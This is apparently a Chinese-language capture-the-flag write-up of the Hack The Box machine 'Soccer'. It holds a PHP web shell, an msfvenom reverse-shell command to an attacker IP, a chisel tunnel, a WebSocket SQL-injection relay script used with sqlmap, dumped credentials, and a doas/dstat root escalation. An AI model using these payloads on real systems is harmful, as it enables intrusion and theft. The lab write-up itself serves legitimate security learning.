HTB-Soccer

Soccer

NMAP enumeration

PORT     STATE SERVICE         REASON         VERSION
22/tcp   open  ssh             syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 ad:0d:84:a3:fd:cc:98:a4:78:fe:f9:49:15:da:e1:6d (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQChXu/2AxokRA9pcTIQx6HKyiO0odku5KmUpklDRNG+9sa6olMd4dSBq1d0rGtsO2rNJRLQUczml6+N5DcCasAZUShDrMnitsRvG54x8GrJyW4nIx4HOfXRTsNqImBadIJtvIww1L7H1DPzMZYJZj/oOwQHXvp85a2hMqMmoqsljtS/jO3tk7NUKA/8D5KuekSmw8m1pPEGybAZxlAYGu3KbasN66jmhf0ReHg3Vjx9e8FbHr3ksc/MimSMfRq0lIo5fJ7QAnbttM5ktuQqzvVjJmZ0+aL7ZeVewTXLmtkOxX9E5ldihtUFj8C6cQroX69LaaN/AXoEZWl/v1LWE5Qo1DEPrv7A6mIVZvWIM8/AqLpP8JWgAQevOtby5mpmhSxYXUgyii5xRAnvDWwkbwxhKcBIzVy4x5TXinVR7FrrwvKmNAG2t4lpDgmryBZ0YSgxgSAcHIBOglugehGZRHJC9C273hs44EToGCrHBY8n2flJe7OgbjEL8Il3SpfUEF0=
|   256 df:d6:a3:9f:68:26:9d:fc:7c:6a:0c:29:e9:61:f0:0c (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIy3gWUPD+EqFcmc0ngWeRLfCr68+uiuM59j9zrtLNRcLJSTJmlHUdcq25/esgeZkyQ0mr2RZ5gozpBd5yzpdzk=
|   256 57:97:56:5d:ef:79:3c:2f:cb:db:35:ff:f1:7c:61:5c (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ2Pj1mZ0q8u/E8K49Gezm3jguM3d8VyAYsX0QyaN6H/
80/tcp   open  http            syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://soccer.htb/
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
9091/tcp open  xmltec-xmlmail? syn-ack ttl 63
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, RPCCheck, SSLSessionReq, drda, informix: 
|     HTTP/1.1 400 Bad Request
|     Connection: close
|   GetRequest: 
|     HTTP/1.1 404 Not Found
|     Content-Security-Policy: default-src 'none'
|     X-Content-Type-Options: nosniff
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 139
|     Date: Sat, 24 Dec 2022 07:01:03 GMT
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <title>Error</title>
|     </head>
|     <body>
|     <pre>Cannot GET /</pre>
|     </body>
|     </html>
|   HTTPOptions, RTSPRequest: 
|     HTTP/1.1 404 Not Found
|     Content-Security-Policy: default-src 'none'
|     X-Content-Type-Options: nosniff
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 143
|     Date: Sat, 24 Dec 2022 07:01:03 GMT
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <title>Error</title>
|     </head>
|     <body>
|     <pre>Cannot OPTIONS /</pre>
|     </body>
|_    </html>

Recon

80/tcp

造訪網頁http://10.10.11.194

添加 /etc/hosts
10.10.11.194 soccer.htb

造訪 http://soccer.htb/

• dirsearch

  Target: http://soccer.htb/
  
  [02:06:16] Starting: 
  [02:06:23] 403 -  564B  - /.ht_wsr.txt
  [02:06:23] 403 -  564B  - /.htaccess.bak1
  [02:06:23] 403 -  564B  - /.htaccess.save
  [02:06:23] 403 -  564B  - /.htaccess.sample
  [02:06:23] 403 -  564B  - /.htaccess.orig
  [02:06:23] 403 -  564B  - /.htaccessOLD2
  [02:06:23] 403 -  564B  - /.htaccessBAK
  [02:06:23] 403 -  564B  - /.htaccessOLD
  [02:06:23] 403 -  564B  - /.htaccess_extra
  [02:06:23] 403 -  564B  - /.htaccess_sc
  [02:06:23] 403 -  564B  - /.htaccess_orig
  [02:06:23] 403 -  564B  - /.html
  [02:06:23] 403 -  564B  - /.htm
  [02:06:23] 403 -  564B  - /.htpasswd_test
  [02:06:23] 403 -  564B  - /.htpasswds
  [02:06:23] 403 -  564B  - /.httr-oauth
  [02:06:45] 403 -  564B  - /admin/.htaccess
  [02:06:55] 403 -  564B  - /administrator/.htaccess
  [02:06:59] 403 -  564B  - /app/.htaccess
  [02:07:24] 200 -    7KB - /index.html

沒看出甚麼結果
改用fuff掃大一點的檔案試試

ffuf -c -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -X POST -u http://soccer.htb/FUZZ

• 訪問 /tiny/
  

EntryPoint

根據
https://github.com/febinrev/tinyfilemanager-2.4.3-exploit
的腳本，找到一組憑據可能是預設的?
admin/admin@123
試著登入

本來想試著上傳文件
結果似乎沒權限

後來發現要在uploads文件夾才有權限上傳
構造惡意語法並上傳
<?php system($_GET['a']); ?>

Get Shell

網頁會自動清除uploads的檔案
怕影響到反連，所以用msfvenom產了一個shell上傳並執行
msfvenom -p linux/x64/shell_reverse_tcp lhost=10.10.14.8 lport=443 -f elf > mal

提權

• netstat -antp

  tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
  tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
  tcp        0      0 127.0.0.1:3000          0.0.0.0:*               LISTEN      -                   
  tcp        0      0 0.0.0.0:9091            0.0.0.0:*               LISTEN      -                   
  tcp        0      0 127.0.0.1:33060         0.0.0.0:*               LISTEN      -                   
  tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
  tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      1093/nginx: worker  
  tcp        0     15 10.10.11.194:47840      10.10.14.8:443          ESTABLISHED 2311/sh             
  tcp        0      0 127.0.0.1:3306          127.0.0.1:41290         ESTABLISHED -                   
  tcp        0      0 127.0.0.1:41290         127.0.0.1:3306          ESTABLISHED -                   
  tcp        0      0 10.10.11.194:9091       10.10.14.8:42182        ESTABLISHED -                   
  tcp6       0      0 :::22                   :::*                    LISTEN      -                   
  tcp6       0      0 :::80                   :::*                    LISTEN      1093/nginx: worker

• 試著訪問端口3000

  #kali
  ./chisel_1.7.7_linux_amd64 server -p 8000 -reverse
  
  #Victim
  ./chisel_1.7.7_linux_amd64 client 10.10.14.8:8000 R:socks

  

設置完代理並訪問
會得到一個很像的網頁
但有登入以及註冊功能

註冊並登入會導向/check

檢查輸入框參數，會送一個id的GET請求，看來我們可以利用id送資料
但直接在url輸入並沒有反應

檢查網頁原始碼，發現參數會送一個ws請求出去驗證ticket是否有效

不能使用sqlmap直接對ws協議做Injection
參考這篇網址構造Middleware server
https://rayhan0x01.github.io/ctf/2021/04/02/blind-sqli-over-websocket-automation.html

# 需添加soc-player子域到/etc/hosts

• ws_sqli.py

  from http.server import SimpleHTTPRequestHandler
  from socketserver import TCPServer
  from urllib.parse import unquote, urlparse
  from websocket import create_connection
  
  ws_server = "ws://soc-player.soccer.htb:9091/ws"
  
  def send_ws(payload):
  	ws = create_connection(ws_server)
  	# If the server returns a response on connect, use below line	
  	#resp = ws.recv() # If server returns something like a token on connect you can find and extract from here
  	
  	# For our case, format the payload in JSON
  	message = unquote(payload).replace('"','\'') # replacing " with ' to avoid breaking JSON structure
  	data = '{"id":"%s"}' % message
  
  	ws.send(data)
  	resp = ws.recv()
  	ws.close()
  
  	if resp:
  		return resp
  	else:
  		return ''
  
  def middleware_server(host_port,content_type="text/plain"):
  
  	class CustomHandler(SimpleHTTPRequestHandler):
  		def do_GET(self) -> None:
  			self.send_response(200)
  			try:
  				payload = urlparse(self.path).query.split('=',1)[1]
  			except IndexError:
  				payload = False
  				
  			if payload:
  				content = send_ws(payload)
  			else:
  				content = 'No parameters specified!'
  
  			self.send_header("Content-type", content_type)
  			self.end_headers()
  			self.wfile.write(content.encode())
  			return
  
  	class _TCPServer(TCPServer):
  		allow_reuse_address = True
  
  	httpd = _TCPServer(host_port, CustomHandler)
  	httpd.serve_forever()
  
  
  print("[+] Starting MiddleWare Server")
  print("[+] Send payloads in http://localhost:8081/?id=*")
  
  try:
  	middleware_server(('0.0.0.0',8081))
  except KeyboardInterrupt:
  	pass

• 執行後可訪問localhost:8081?id=*
  

sqlmap

sqlmap -u "http://localhost:8081/?id=1" --dbs --batch

• dump出密碼

  player / PlayerOftheMatch2022

  

ssh登入

利用剛剛的憑證登入player

SUID enumeration

find / -perm -u=s 2>/dev/null

/usr/local/bin/doas
/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/bin/umount
/usr/bin/fusermount
/usr/bin/mount
/usr/bin/su
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/at
/snap/snapd/17883/usr/lib/snapd/snap-confine
/snap/core20/1695/usr/bin/chfn
/snap/core20/1695/usr/bin/chsh
/snap/core20/1695/usr/bin/gpasswd
/snap/core20/1695/usr/bin/mount
/snap/core20/1695/usr/bin/newgrp
/snap/core20/1695/usr/bin/passwd
/snap/core20/1695/usr/bin/su
/snap/core20/1695/usr/bin/sudo
/snap/core20/1695/usr/bin/umount
/snap/core20/1695/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/1695/usr/lib/openssh/ssh-keysign

doas指令提權

先找尋他的設定檔 一開始是找/etc/doas.conf但沒成功
用find去尋找

find / -iname "doas.conf" 2>/dev/null

/usr/local/etc/doas.conf

• dstat搭配doas

  查看dstat的man page
  發現可以執行外部腳本插件

  

因為/usr/share/dstat沒有權限寫入
改用/usr/local/share/dstat/

• dstat_priv.py

  import subprocess
  
  subprocess.run(["bash"])

• 利用doas執行dstat並附上插件

  doas /usr/bin/dstat --priv

  

FLAG

• user

  35907f92e87694451271ef44e476bcb8

• root

  8a8620bfc3502b614ccb3aa46ff7de90